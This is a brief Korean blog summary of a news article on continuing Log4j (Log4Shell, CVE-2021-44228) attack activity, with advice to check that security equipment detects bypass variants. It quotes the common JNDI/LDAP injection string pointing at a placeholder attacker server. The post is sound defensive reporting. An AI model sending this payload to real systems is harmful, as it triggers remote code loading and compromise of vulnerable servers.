IT 보안/보안최신동향
[220505] 로그4셸 공격 건수 분석해보니... Log4j 취약점 공격은 현재진행형!
밍구21
2022. 5. 8. 22:06
🔽기사 전문
http://www.boannews.com/media/view.asp?idx=106569
[요약]
- CVE-2021-44228인 Log4j 취약점. 발견된 12월에 최고점을 찍었지만 2월 8일 200여 건 발생 등 여전히 공격 존재
- 공격에 주로 사용되는 코드는 ‘${jndi:ldap://server_ip:****/exploit}’, 우회를 위해 다양하게 변화됨
- 공격 형태가 매우 다양하므로 우회 가능성을 인지하고 보안 장비가 제대로 공격을 탐지하는지 점검해야 함